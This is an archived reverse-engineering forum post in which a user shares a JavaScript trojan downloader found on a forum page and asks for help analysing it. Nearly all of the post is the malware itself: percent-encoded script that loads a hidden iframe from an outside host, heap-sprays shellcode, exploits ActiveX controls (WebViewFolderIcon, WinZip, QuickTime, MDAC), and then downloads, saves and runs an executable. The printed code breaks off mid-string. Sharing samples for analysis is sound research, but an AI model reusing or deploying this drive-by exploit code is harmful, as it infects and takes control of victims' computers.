JSTrojan downloader [Archive] - RCE Messageboard's Regroupment

View Full Version : JSTrojan downloader

Silkut

11-05-2007, 10:03 AM

Hi,

This not a packed malware, nor an unknown one. I wonder if I must post it on a blog or if it fits here, anyway it might be interesting and I need your help concerning one point.

On some cracking/reversing forum I'm visiting (I call it website.com/forum/ and its redirection redirection.com here) a mate's AV turned crazy with a jscript being executed (credits to Guetta).
The AV is Kaspersky, and the script is identified as Trojan-downloader.JS.psyme.nc

http://www.redirection.com/wbicm.js

Code:

 

 

 

Forum 

 

 

 

 

 

 

 

 

 

 <br />
<body bgcolor="#FFFFFF" text="#000000">    <br />
<script language='JavaScript' type='text/javascript' src='bskrf.js'></script> <br />
<a href="http://website.com/forum//wbicm.js">Click here to continue to Forum</a> <br />
</body> <br />

http://www.redirection.com/bskrf.js (The script was successfully catched using Opera, it failed with Firefox (404) which seems to be the target, in fact)

Code:

var arg="vxnhnuse"; 



var MU = "http://" + window.location.hostname + "/" + arg; 

var MH = ''; 

for (i=0; i < MU.length; i++) 

{ 

        var b = MU.charCodeAt (i); 

   MH = MH + b.toString (16); 

} 

MH = MH.toUpperCase(); 

if (Math.round(MU.length/2) != (MU.length/2)) 

{ 

   MH += '00'; 

} 



var MR = ''; 

for (i=0; i < MH.length; i += 4) 

{ 

   MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2); 

} 



var MU2 = "\"" + MU + "\""; 

var MR2 = "\"" + MR + "\""; 



var SB = 

unescape ('%0a%3c%68%74%6d%6c%3e%0a%3c%62%6f%64%79%3e%0a%3c%64%69%76%20%69%64%3d%22%6d%79%64%69%76%22%3e%3c%2 f%64%69%76%3e%0a%3c%69%66%72%61%6d%65%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%27 %20%77%69%64%74%68%3d%31%20%68%65%69%67%68%74%3d%31%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%62%64%73% 2e%69%6e%76%69%74%61%74%69%6f%6e%73%2e%66%72%2f%73%73%70%2f%27%3e%3c%2f%69%66%72%61%6d%65%3e%0a%0a%3 c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%4a%61%76%61%53%63%72%69%70%74%22%3e%0a%0a%76%61 %72%20%6d%65%6d%6f%72%79%20%3d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%0a%76%61%72%20%6d%65%6d%5f%66% 6c%61%67%20%3d%20%30%3b%0a%0a%66%75%6e%63%74%69%6f%6e%20%68%61%76%69%6e%67%28%29%20%7b%20%6d%65%6d%6 f%72%79%3d%6d%65%6d%6f%72%79%3b%20%73%65%74%54%69%6d%65%6f%75%74%28%22%68%61%76%69%6e%67%28%29%22%2c %20%32%30%30%30%29%3b%20%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%67%65%74%53%70%72%61%79%53%6c%69%64%65% 28%73%70%72%61%79%53%6c%69%64%65%2c%20%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%29%0a%7b%0a%09%77%6 8%69%6c%65%20%28%73%70%72%61%79%53%6c%69%64%65%2e%6c%65%6e%67%74%68%2a%32%3c%73%70%72%61%79%53%6c%69 %64%65%53%69%7a%65%29%0a%09%7b%73%70%72%61%79%53%6c%69%64%65%20%2b%3d%20%73%70%72%61%79%53%6c%69%64% 65%3b%7d%0a%0a%09%73%70%72%61%79%53%6c%69%64%65%20%3d%20%73%70%72%61%79%53%6c%69%64%65%2e%73%75%62%7 3%74%72%69%6e%67%28%30%2c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%2f%32%29%3b%0a%09%72%65%74%75%72 %6e%20%73%70%72%61%79%53%6c%69%64%65%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%6d%61%6b%65%53%6c%69% 64%65%28%29%0a%7b%0a%09%76%61%72%20%68%65%61%70%53%70%72%61%79%54%6f%41%64%64%72%65%73%73%20%3d%20%3 0%78%30%63%30%63%30%63%30%63%3b%0a%09%76%61%72%20%70%61%79%4c%6f%61%64%43%6f%64%65%20%3d%20%75%6e%65 %73%63%61%70%65%28%22%25%75%34%33%34%33%25%75%34%33%34%33%25%75%30%66%65%62%25%75%33%33%35%62%25%75% 36%36%63%39%25%75%38%30%62%39%25%75%38%30%30%31%25%75%65%66%33%33%22%20%2b%0a%22%25%75%65%32%34%33%2 5%75%65%62%66%61%25%75%65%38%30%35%25%75%66%66%65%63%25%75%66%66%66%66%25%75%38%62%37%66%25%75%64%66 %34%65%25%75%65%66%65%66%25%75%36%34%65%66%25%75%65%33%61%66%25%75%39%66%36%34%25%75%34%32%66%33%25% 75%39%66%36%34%25%75%36%65%65%37%25%75%65%66%30%33%25%75%65%66%65%62%22%20%2b%0a%22%25%75%36%34%65%6 6%25%75%62%39%30%33%25%75%36%31%38%37%25%75%65%31%61%31%25%75%30%37%30%33%25%75%65%66%31%31%25%75%65 %66%65%66%25%75%61%61%36%36%25%75%62%39%65%62%25%75%37%37%38%37%25%75%36%35%31%31%25%75%30%37%65%31% 25%75%65%66%31%66%25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%65%37%22%20%2b%0a%22%25%75%63%61%3 8%37%25%75%31%30%35%66%25%75%30%37%32%64%25%75%65%66%30%64%25%75%65%66%65%66%25%75%61%61%36%36%25%75 %62%39%65%33%25%75%30%30%38%37%25%75%30%66%32%31%25%75%30%37%38%66%25%75%65%66%33%62%25%75%65%66%65% 66%25%75%61%61%36%36%25%75%62%39%66%66%25%75%32%65%38%37%25%75%30%61%39%36%22%20%2b%0a%22%25%75%30%3 7%35%37%25%75%65%66%32%39%25%75%65%66%65%66%25%75%61%61%36%36%25%75%61%66%66%62%25%75%64%37%36%66%25 %75%39%61%32%63%25%75%36%36%31%35%25%75%66%37%61%61%25%75%65%38%30%36%25%75%65%66%65%65%25%75%62%31% 65%66%25%75%39%61%36%36%25%75%36%34%63%62%25%75%65%62%61%61%25%75%65%65%38%35%22%20%2b%0a%22%25%75%3 6%34%62%36%25%75%66%37%62%61%25%75%30%37%62%39%25%75%65%66%36%34%25%75%65%66%65%66%25%75%38%37%62%66 %25%75%66%35%64%39%25%75%39%66%63%30%25%75%37%38%30%37%25%75%65%66%65%66%25%75%36%36%65%66%25%75%66% 33%61%61%25%75%32%61%36%34%25%75%32%66%36%63%25%75%36%36%62%66%25%75%63%66%61%61%22%20%2b%0a%22%25%7 5%31%30%38%37%25%75%65%66%65%66%25%75%62%66%65%66%25%75%61%61%36%34%25%75%38%35%66%62%25%75%62%36%65 %64%25%75%62%61%36%34%25%75%30%37%66%37%25%75%65%66%38%65%25%75%65%66%65%66%25%75%61%61%65%63%25%75% 32%38%63%66%25%75%62%33%65%66%25%75%63%31%39%31%25%75%32%38%38%61%25%75%65%62%61%66%22%20%2b%0a%22%2 5%75%38%61%39%37%25%75%65%66%65%66%25%75%39%61%31%30%25%75%36%34%63%66%25%75%65%33%61%61%25%75%65%65 %38%35%25%75%36%34%62%36%25%75%66%37%62%61%25%75%61%66%30%37%25%75%65%66%65%66%25%75%38%35%65%66%25% 75%62%37%65%38%25%75%61%61%65%63%25%75%64%63%63%62%25%75%62%63%33%34%25%75%31%30%62%63%22%20%2b%0a%2 2%25%75%63%66%39%61%25%75%62%63%62%66%25%75%61%61%36%34%25%75%38%35%66%33%25%75%62%36%65%61%25%75%62 %61%36%34%25%75%30%37%66%37%25%75%65%66%63%63%25%75%65%66%65%66%25%75%65%66%38%35%25%75%39%61%31%30% 25%75%36%34%63%66%25%75%65%37%61%61%25%75%65%64%38%35%25%75%36%34%62%36%25%75%66%37%62%61%22%20%2b%0 a%22%25%75%66%66%30%37%25%75%65%66%65%66%25%75%38%35%65%66%25%75%36%34%31%30%25%75%66%66%61%61%25%75 %65%65%38%35%25%75%36%34%62%36%25%75%66%37%62%61%25%75%65%66%30%37%25%75%65%66%65%66%25%75%61%65%65% 66%25%75%62%64%62%34%25%75%30%65%65%63%25%75%30%65%65%63%25%75%30%65%65%63%25%75%30%65%65%63%22%20%2 b%0a%22%25%75%30%33%36%63%25%75%62%35%65%62%25%75%36%34%62%63%25%75%30%64%33%35%25%75%62%64%31%38%25 %75%30%66%31%30%25%75%36%34%62%61%25%75%36%34%30%33%25%75%65%37%39%32%25%75%62%32%36%34%25%75%62%39% 65%33%25%75%39%63%36%34%25%75%36%34%64%33%25%75%66%31%39%62%25%75%65%63%39%37%25%75%62%39%31%63%22%2 0%2b%0a%22%25%75%39%39%36%34%25%75%65%63%63%66%25%75%64%63%31%63%25%75%61%36%32%36%25%75%34%32%61%65 %25%75%32%63%65%63%25%75%64%63%62%39%25%75%65%30%31%39%25%75%66%66%35%31%25%75%31%64%64%35%25%75%65% 37%39%62%25%75%32%31%32%65%25%75%65%63%65%32%25%75%61%66%31%64%25%75%31%65%30%34%25%75%31%31%64%34%2 2%20%2b%0a%22%25%75%39%61%62%31%25%75%62%35%30%61%25%75%30%34%36%34%25%75%62%35%36%34%25%75%65%63%63 %62%25%75%38%39%33%32%25%75%65%33%36%34%25%75%36%34%61%34%25%75%66%33%62%35%25%75%33%32%65%63%25%75% 65%62%36%34%25%75%65%63%36%34%25%75%62%31%32%61%25%75%32%64%62%32%25%75%65%66%65%37%25%75%31%62%30%3 7%22%20%2b%0a%22%25%75%31%30%31%31%25%75%62%61%31%30%25%75%61%33%62%64%25%75%61%30%61%32%25%75%65%66 %61%31%22%20%2b%20%20%20%20') + 

MR2 +

unescape ('%29%3b%0a%09%76%61%72%20%68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%20%3d%20%30%78%34%30%30%30%30%30%3 b%0a%09%76%61%72%20%70%61%79%4c%6f%61%64%53%69%7a%65%20%3d%20%70%61%79%4c%6f%61%64%43%6f%64%65%2e%6c %65%6e%67%74%68%20%2a%20%32%3b%0a%09%76%61%72%20%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%20%3d%20% 68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%20%2d%20%28%70%61%79%4c%6f%61%64%53%69%7a%65%2b%30%78%33%38%2 9%3b%0a%09%76%61%72%20%73%70%72%61%79%53%6c%69%64%65%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%30 %63%30%63%25%75%30%63%30%63%22%29%3b%0a%0a%09%73%70%72%61%79%53%6c%69%64%65%20%3d%20%67%65%74%53%70% 72%61%79%53%6c%69%64%65%28%73%70%72%61%79%53%6c%69%64%65%2c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%6 5%29%3b%0a%09%68%65%61%70%42%6c%6f%63%6b%73%20%3d%20%28%68%65%61%70%53%70%72%61%79%54%6f%41%64%64%72 %65%73%73%20%2d%20%30%78%34%30%30%30%30%30%29%2f%68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%3b%0a%09%0a% 09%66%6f%72%20%28%69%3d%30%3b%69%3c%68%65%61%70%42%6c%6f%63%6b%73%3b%69%2b%2b%29%0a%09%7b%0a%09%09%6 d%65%6d%6f%72%79%5b%69%5d%20%3d%20%73%70%72%61%79%53%6c%69%64%65%20%2b%20%70%61%79%4c%6f%61%64%43%6f %64%65%3b%0a%09%7d%0a%0a%09%6d%65%6d%5f%66%6c%61%67%20%3d%20%31%3b%0a%09%68%61%76%69%6e%67%28%29%3b% 0a%09%72%65%74%75%72%6e%20%6d%65%6d%6f%72%79%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%7 4%57%56%46%28%29%0a%7b%0a%09%66%6f%72%20%28%69%3d%30%3b%69%3c%31%32%38%3b%69%2b%2b%29%0a%09%7b%0a%09 %09%74%72%79%7b%20%0a%09%09%09%76%61%72%20%74%61%72%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62% 6a%65%63%74%28%27%57%65%62%56%69%65%77%46%6f%6c%64%65%72%49%63%6f%6e%2e%57%65%62%56%69%65%77%46%6f%6 c%64%65%72%49%63%6f%6e%2e%31%27%29%3b%0a%09%09%09%74%61%72%2e%73%65%74%53%6c%69%63%65%28%30%78%37%66 %66%66%66%66%66%65%2c%20%30%78%30%63%30%63%30%63%30%63%2c%20%30%78%30%63%30%63%30%63%30%63%2c%30%78% 30%63%30%63%30%63%30%63%20%29%3b%20%0a%09%09%7d%63%61%74%63%68%28%65%29%7b%7d%0a%09%7d%0a%7d%0a%0a%6 6%75%6e%63%74%69%6f%6e%20%73%74%61%72%74%57%69%6e%5a%69%70%28%6f%62%6a%65%63%74%29%0a%7b%0a%09%76%61 %72%20%78%68%20%3d%20%27%41%27%3b%0a%09%77%68%69%6c%65%20%28%78%68%2e%6c%65%6e%67%74%68%20%3c%20%32% 33%31%29%20%78%68%2b%3d%27%41%27%3b%0a%09%78%68%2b%3d%22%5c%78%30%63%5c%78%30%63%5c%78%30%63%5c%78%3 0%63%5c%78%30%63%5c%78%30%63%5c%78%30%63%22%3b%0a%09%6f%62%6a%65%63%74%2e%43%72%65%61%74%65%4e%65%77 %46%6f%6c%64%65%72%46%72%6f%6d%4e%61%6d%65%28%78%68%29%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73% 74%61%72%74%4f%76%65%72%66%6c%6f%77%28%6e%75%6d%29%0a%7b%0a%09%69%66%20%28%6e%75%6d%20%3d%3d%20%30%2 9%20%7b%0a%09%09%74%72%79%20%7b%0a%09%09%09%76%61%72%20%71%74%20%3d%20%6e%65%77%20%41%63%74%69%76%65 %58%4f%62%6a%65%63%74%28%27%51%75%69%63%6b%54%69%6d%65%2e%51%75%69%63%6b%54%69%6d%65%27%29%3b%09%09% 0a%09%09%09%69%66%20%28%71%74%29%20%7b%0a%09%09%09%09%76%61%72%20%71%74%68%74%6d%6c%20%3d%20%27%3c%6 f%62%6a%65%63%74%20%43%4c%41%53%53%49%44%3d%22%63%6c%73%69%64%3a%30%32%42%46%32%35%44%35%2d%38%43%31 %37%2d%34%42%32%33%2d%42%43%38%30%2d%44%33%34%38%38%41%42%44%44%43%36%42%22%20%77%69%64%74%68%3d%22% 31%22%20%68%65%69%67%68%74%3d%22%31%22%20%73%74%79%6c%65%3d%22%62%6f%72%64%65%72%3a%30%70%78%22%3e%2 7%2b%0a%09%09%09%09%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%73%72%63%22%20%76%61%6c%75%65%3d%22%68 %74%74%70%3a%2f%2f%61%6c%2d%77%69%6c%6c%69%61%6d%73%2e%63%6f%6d%2f%74%58%6c%77%70%4b%44%4c%2f%75%43% 66%49%58%72%55%63%56%70%79%63%4d%6b%56%6a%2e%71%74%6c%22%3e%27%2b%0a%09%09%09%09%27%3c%70%61%72%61%6 d%20%6e%61%6d%65%3d%22%61%75%74%6f%70%6c%61%79%22%20%76%61%6c%75%65%3d%22%74%72%75%65%22%3e%27%2b%0a %09%09%09%09%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%6c%6f%6f%70%22%20%76%61%6c%75%65%3d%22%66%61% 6c%73%65%22%3e%27%2b%0a%09%09%09%09%27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%63%6f%6e%74%72%6f%6c%6 c%65%72%22%20%76%61%6c%75%65%3d%22%74%72%75%65%22%3e%27%2b%0a%09%09%09%09%27%3c%2f%6f%62%6a%65%63%74 %3e%27%3b%0a%09%09%09%09%69%66%20%28%21%20%6d%65%6d%5f%66%6c%61%67%29%20%6d%61%6b%65%53%6c%69%64%65% 28%29%3b%0a%09%09%09%09%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%27%6 d%79%64%69%76%27%29%2e%69%6e%6e%65%72%48%54%4d%4c%20%3d%20%71%74%68%74%6d%6c%3b%0a%09%09%09%09%6e%75 %6d%20%3d%20%32%35%35%3b%0a%09%09%09%7d%0a%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%0a%09% 09%69%66%20%28%6e%75%6d%20%3d%20%32%35%35%29%20%73%65%74%54%69%6d%65%6f%75%74%28%22%73%74%61%72%74%4 f%76%65%72%66%6c%6f%77%28%31%29%22%2c%20%32%30%30%30%29%3b%0a%09%09%65%6c%73%65%20%73%74%61%72%74%4f %76%65%72%66%6c%6f%77%28%31%29%3b%0a%0a%09%7d%20%65%6c%73%65%20%69%66%20%28%6e%75%6d%20%3d%3d%20%31% 29%20%7b%0a%09%09%74%72%79%20%7b%0a%09%09%09%76%61%72%20%77%69%6e%7a%69%70%20%3d%20%64%6f%63%75%6d%6 5%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%22%6f%62%6a%65%63%74%22%29%3b%0a%09%09%09%77%69 %6e%7a%69%70%2e%73%65%74%41%74%74%72%69%62%75%74%65%28%22%63%6c%61%73%73%69%64%22%2c%20%22%63%6c%73% 69%64%3a%41%30%39%41%45%36%38%46%2d%42%31%34%44%2d%34%33%45%44%2d%42%37%31%33%2d%42%41%34%31%33%46%3 0%33%34%39%30%34%22%29%3b%0a%0a%09%09%09%76%61%72%20%72%65%74%3d%77%69%6e%7a%69%70%2e%43%72%65%61%74 %65%4e%65%77%46%6f%6c%64%65%72%46%72%6f%6d%4e%61%6d%65%28%75%6e%65%73%63%61%70%65%28%22%25%30%30%22% 29%29%3b%0a%09%09%09%69%66%20%28%72%65%74%20%3d%3d%20%66%61%6c%73%65%29%20%7b%0a%09%09%09%09%69%66%2 0%28%21%20%6d%65%6d%5f%66%6c%61%67%29%20%6d%61%6b%65%53%6c%69%64%65%28%29%3b%0a%09%09%09%09%73%74%61 %72%74%57%69%6e%5a%69%70%28%77%69%6e%7a%69%70%29%3b%0a%09%09%09%09%6e%75%6d%20%3d%20%32%35%35%3b%0a% 09%09%09%7d%0a%0a%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%0a%09%09%69%66%20%28%6e%75%6d%2 0%3d%20%32%35%35%29%20%73%65%74%54%69%6d%65%6f%75%74%28%22%73%74%61%72%74%4f%76%65%72%66%6c%6f%77%28 %32%29%22%2c%20%32%30%30%30%29%3b%0a%09%09%65%6c%73%65%20%73%74%61%72%74%4f%76%65%72%66%6c%6f%77%28% 32%29%3b%0a%0a%09%7d%20%65%6c%73%65%20%69%66%20%28%6e%75%6d%20%3d%3d%20%32%29%20%7b%0a%0a%09%09%74%7 2%79%20%7b%0a%09%09%09%76%61%72%20%74%61%72%20%3d%20%6e%65%77%20%41%63%74%69%76%65%58%4f%62%6a%65%63 %74%28%27%57%65%62%56%69%65%77%46%6f%6c%64%65%72%49%63%6f%6e%2e%57%65%62%56%69%65%77%46%6f%6c%64%65% 72%49%63%6f%6e%2e%31%27%29%3b%0a%09%09%09%69%66%20%28%74%61%72%29%20%7b%0a%09%09%09%09%69%66%20%28%2 1%20%6d%65%6d%5f%66%6c%61%67%29%20%6d%61%6b%65%53%6c%69%64%65%28%29%3b%0a%09%09%09%09%73%74%61%72%74 %57%56%46%28%29%3b%0a%09%09%09%7d%0a%09%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%09%7d%0a%7d% 0a%0a%0a%66%75%6e%63%74%69%6f%6e%20%47%65%74%52%61%6e%64%53%74%72%69%6e%67%28%6c%65%6e%29%0a%7b%0a%0 9%76%61%72%20%63%68%61%72%73%20%3d%20%22%61%62%63%64%65%66%67%68%69%6b%6c%6d%6e%6f%70%71%72%73%74%75 %76%77%78%79%7a%22%3b%0a%09%76%61%72%20%73%74%72%69%6e%67%5f%6c%65%6e%67%74%68%20%3d%20%6c%65%6e%3b% 0a%09%76%61%72%20%72%61%6e%64%6f%6d%73%74%72%69%6e%67%20%3d%20%27%27%3b%0a%09%66%6f%72%20%28%76%61%7 2%20%69%3d%30%3b%20%69%3c%73%74%72%69%6e%67%5f%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%76 %61%72%20%72%6e%75%6d%20%3d%20%4d%61%74%68%2e%66%6c%6f%6f%72%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28% 29%20%2a%20%63%68%61%72%73%2e%6c%65%6e%67%74%68%29%3b%0a%09%09%72%61%6e%64%6f%6d%73%74%72%69%6e%67%2 0%2b%3d%20%63%68%61%72%73%2e%73%75%62%73%74%72%69%6e%67%28%72%6e%75%6d%2c%72%6e%75%6d%2b%31%29%3b%0a %09%7d%0a%0a%09%72%65%74%75%72%6e%20%72%61%6e%64%6f%6d%73%74%72%69%6e%67%3b%0a%7d%0a%0a%66%75%6e%63% 74%69%6f%6e%20%43%72%65%61%74%65%4f%62%6a%65%63%74%28%43%4c%53%49%44%2c%20%6e%61%6d%65%29%20%7b%0a%0 9%76%61%72%20%72%20%3d%20%6e%75%6c%6c%3b%0a%09%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c %53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65% 29%7b%7d%09%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%4 3%4c%53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%29%27%29%20%7d%63%61 %74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c% 28%27%72%20%3d%20%43%4c%53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%2 c%20%22%22%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29%20%7b%20 %74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62%6a%65%63%74%28%22% 22%2c%20%6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%2 9%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62%6a%65%63 %74%28%6e%61%6d%65%2c%20%22%22%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28% 21%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%6 2%6a%65%63%74%28%6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%72%65%74%75%72 %6e%28%72%29%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%58%4d%4c%48%74%74%70%44%6f%77%6e%6c%6f%61%64% 28%78%6d%6c%2c%20%75%72%6c%29%20%7b%0a%0a%09%74%72%79%20%7b%0a%09%09%78%6d%6c%2e%6f%70%65%6e%28%22%4 7%45%54%22%2c%20%75%72%6c%2c%20%66%61%6c%73%65%29%3b%0a%09%09%78%6d%6c%2e%73%65%6e%64%28%6e%75%6c%6c %29%3b%0a%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%72%65%74%75%72%6e%20%30%3b%20%7d%0a%0a%09%72% 65%74%75%72%6e%20%78%6d%6c%2e%72%65%73%70%6f%6e%73%65%42%6f%64%79%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6 f%6e%20%41%44%4f%42%44%53%74%72%65%61%6d%53%61%76%65%28%6f%2c%20%6e%61%6d%65%2c%20%64%61%74%61%29%20 %7b%0a%0a%09%74%72%79%20%7b%0a%09%09%6f%2e%54%79%70%65%20%3d%20%31%3b%0a%09%09%6f%2e%4d%6f%64%65%20% 3d%20%33%3b%0a%09%09%6f%2e%4f%70%65%6e%28%29%3b%0a%09%09%6f%2e%57%72%69%74%65%28%64%61%74%61%29%3b%0 a%09%09%6f%2e%53%61%76%65%54%6f%46%69%6c%65%28%6e%61%6d%65%2c%20%32%29%3b%0a%09%09%6f%2e%43%6c%6f%73 %65%28%29%3b%0a%09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%72%65%74%75%72%6e%20%30%3b%20%7d%0a%0a%09% 72%65%74%75%72%6e%20%31%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%53%68%65%6c%6c%45%78%65%63%75%74%6 5%28%65%78%65%63%2c%20%6e%61%6d%65%2c%20%74%79%70%65%29%20%7b%0a%0a%09%69%66%20%28%74%79%70%65%20%3d %3d%20%30%29%20%7b%0a%09%09%74%72%79%20%7b%20%65%78%65%63%2e%52%75%6e%28%6e%61%6d%65%2c%20%30%29%3b% 20%72%65%74%75%72%6e%20%31%3b%20%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%09%7d%20%65%6c%73%65%2 0%7b%0a%09%09%74%72%79%20%7b%20%65%78%65%2e%53%68%65%6c%6c%45%78%65%63%75%74%65%28%6e%61%6d%65%29%3b %20%72%65%74%75%72%6e%20%31%3b%20%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%09%7d%0a%0a%09%72%65% 74%75%72%6e%28%30%29%3b%0a%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%4d%44%41%43%28%29%20%7b%0a%09%76%6 1%72%20%74%20%3d%20%6e%65%77%20%41%72%72%61%79%28%27%7b%42%44%39%36%43%35%35%36%2d%36%35%41%33%2d%31 %31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%30%7d%27%2c%20%27%7b%42%44%39%36%43%35% 35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46%43%32%39%45%33%36%7d%27%2c%2 0%27%7b%41%42%39%42%43%45%44%44%2d%45%43%37%45%2d%34%37%45%31%2d%39%33%32%32%2d%44%34%41%32%31%30%36 %31%37%31%31%36%7d%27%2c%20%27%7b%30%30%30%36%46%30%33%33%2d%30%30%30%30%2d%30%30%30%30%2d%43%30%30% 30%2d%30%30%30%30%30%30%30%30%30%30%34%36%7d%27%2c%20%27%7b%30%30%30%36%46%30%33%41%2d%30%30%30%30%2 d%30%30%30%30%2d%43%30%30%30%2d%30%30%30%30%30%30%30%30%30%30%34%36%7d%27%2c%20%27%7b%36%65%33%32%30 %37%30%61%2d%37%36%36%64%2d%34%65%65%36%2d%38%37%39%63%2d%64%63%31%66%61%39%31%64%32%66%63%33%7d%27% 2c%20%27%7b%36%34%31%34%35%31%32%42%2d%42%39%37%38%2d%34%35%31%44%2d%41%30%44%38%2d%46%43%46%44%46%3 3%33%45%38%33%33%43%7d%27%2c%20%27%7b%37%46%35%42%37%46%36%33%2d%46%30%36%46%2d%34%33%33%31%2d%38%41 %32%36%2d%33%33%39%45%30%33%43%30%41%45%33%44%7d%27%2c%20%27%7b%30%36%37%32%33%45%30%39%2d%46%34%43% 32%2d%34%33%63%38%2d%38%33%35%38%2d%30%39%46%43%44%31%44%42%30%37%36%36%7d%27%2c%20%27%7b%36%33%39%4 6%37%32%35%46%2d%31%42%32%44%2d%34%38%33%31%2d%41%39%46%44%2d%38%37%34%38%34%37%36%38%32%30%31%30%7d %27%2c%20%27%7b%42%41%30%31%38%35%39%39%2d%31%44%42%33%2d%34%34%66%39%2d%38%33%42%34%2d%34%36%31%34% 35%34%43%38%34%42%46%38%7d%27%2c%20%27%7b%44%30%43%30%37%44%35%36%2d%37%43%36%39%2d%34%33%46%31%2d%4 2%34%41%30%2d%32%35%46%35%41%31%31%46%41%42%31%39%7d%27%2c%20%27%7b%45%38%43%43%43%44%44%46%2d%43%41 %32%38%2d%34%39%36%62%2d%42%30%35%30%2d%36%43%30%37%43%39%36%32%34%37%36%42%7d%27%2c%20%6e%75%6c%6c% 29%3b%0a%09%76%61%72%20%76%20%3d%20%6e%65%77%20%41%72%72%61%79%28%6e%75%6c%6c%2c%20%6e%75%6c%6c%2c%2 0%6e%75%6c%6c%29%3b%0a%09%76%61%72%20%69%20%3d%20%30%3b%0a%09%76%61%72%20%6e%20%3d%20%30%3b%0a%09%76 %61%72%20%72%65%74%20%3d%20%30%3b%0a%09%76%61%72%20%75%72%6c%52%65%61%6c%45%78%65%20%3d%20%20%20') +

MU2 +

unescape ('%3b%0a%0a%09%77%68%69%6c%65%20%28%74%5b%69%5d%20%26%26%20%28%21%20%76%5b%30%5d%20%7c%7c%20%21%20%7 6%5b%31%5d%20%7c%7c%20%21%20%76%5b%32%5d%29%20%29%20%7b%0a%09%09%76%61%72%20%61%20%3d%20%6e%75%6c%6c %3b%0a%0a%09%09%74%72%79%20%7b%0a%09%09%09%61%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65% 45%6c%65%6d%65%6e%74%28%22%6f%62%6a%65%63%74%22%29%3b%0a%09%09%09%61%2e%73%65%74%41%74%74%72%69%62%7 5%74%65%28%22%63%6c%61%73%73%69%64%22%2c%20%22%63%6c%73%69%64%3a%22%20%2b%20%74%5b%69%5d%2e%73%75%62 %73%74%72%69%6e%67%28%31%2c%20%74%5b%69%5d%2e%6c%65%6e%67%74%68%20%2d%20%31%29%29%3b%0a%09%09%7d%20% 63%61%74%63%68%28%65%29%20%7b%20%61%20%3d%20%6e%75%6c%6c%3b%20%7d%0a%09%09%0a%09%09%69%66%20%28%61%2 9%20%7b%0a%09%09%09%69%66%20%28%21%20%76%5b%30%5d%29%20%7b%0a%09%09%09%09%76%5b%30%5d%20%3d%20%43%72 %65%61%74%65%4f%62%6a%65%63%74%28%61%2c%20%22%6d%73%78%6d%6c%32%2e%58%4d%4c%48%54%54%50%22%29%3b%0a% 09%09%09%09%69%66%20%28%21%20%76%5b%30%5d%29%20%76%5b%30%5d%20%3d%20%43%72%65%61%74%65%4f%62%6a%65%6 